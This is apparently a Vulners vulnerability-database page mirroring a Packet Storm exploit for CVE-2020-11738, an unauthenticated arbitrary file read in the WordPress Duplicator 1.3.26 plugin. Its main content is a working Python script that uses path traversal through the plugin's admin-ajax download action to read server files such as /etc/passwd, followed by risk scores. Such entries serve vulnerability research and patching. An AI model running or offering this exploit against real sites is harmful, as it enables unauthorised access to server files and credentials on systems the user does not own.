Lucene search
K

WordPress Duplicator 1.3.26 Arbitrary File Read

🗓️ 18 Oct 2021 00:00:00Reported by nam3lumType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 513 Views

WordPress Duplicator 1.3.26 Arbitrary File Read exploi

Related
Code
`# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read  
# Date: October 16, 2021  
# Exploit Author: nam3lum  
# Vendor Homepage: https://wordpress.org/plugins/duplicator/  
# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]  
# Version: 1.3.26  
# Tested on: Ubuntu 16.04  
# CVE : CVE-2020-11738  
  
import requests as re  
import sys  
  
if len(sys.argv) != 3:  
print("Exploit made by nam3lum.")  
print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")  
exit()  
  
arg = sys.argv[1]  
file = sys.argv[2]  
  
URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file  
  
output = re.get(url = URL)  
print(output.text)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

18 Oct 2021 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
CVSS 37.5
EPSS0.94252
513